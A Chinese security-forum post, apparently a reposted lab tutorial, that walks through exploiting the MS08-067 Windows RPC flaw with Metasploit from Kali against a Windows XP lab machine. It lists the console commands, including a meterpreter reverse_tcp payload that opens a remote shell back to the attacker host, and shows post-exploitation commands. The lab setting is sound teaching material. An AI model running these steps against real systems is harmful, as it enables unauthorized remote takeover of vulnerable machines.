安全矩阵

 找回密码
 立即注册
搜索
查看: 2479|回复: 0

利用msf工具进行靶机渗透研究

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-6-8 15:03:45 | 显示全部楼层 |阅读模式
原文链接:利用msf工具进行靶机渗透研究
漏洞简介
MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。
如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。此漏洞可能用于进行蠕虫攻击。防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。
实验环境:工具:metasploit
靶机两台:windows xp2和kali2020
攻击机的IP(kali):192.168.29.133
靶机IP(xp2): 192.168.29.134
实验条件:两台机子可以互通的,并且windows xp2(需打开445端口,默认为打开)开启了445端口,防火墙是关闭的。
步骤:(1)在kali终端输入msfconsole,启动Metasploit工具

(2)输入命令search ms08_067,查找关于ms08_0**67的漏洞模块。

(3)输入如下命令,使用该漏洞模块

(4)进入这个模块后,用show options 查看该模块需要配置的参数

(5)设置配置项(show options)
设置靶机IP(xp2)set RHOST 192.168.29.134

设置要执行的payload:
set payload windows/meterpreter/reverse_tcp

设置攻击机的IP(kali):
set LHOST 192.168.29.133

设置要攻击的目标操作系统类型:
set target 34

用show options查看相关参数是否配置正确

(6)最后,输入exploit,回车运行,进入到特殊的payload—-meterpreter,该payload在控制靶机之后,能够对靶机执行更多的渗透攻击。用 pwd查看靶机当前的工作路径,用ipconfig命令查看靶机的IP地址配置





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 06:27 , Processed in 0.012081 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表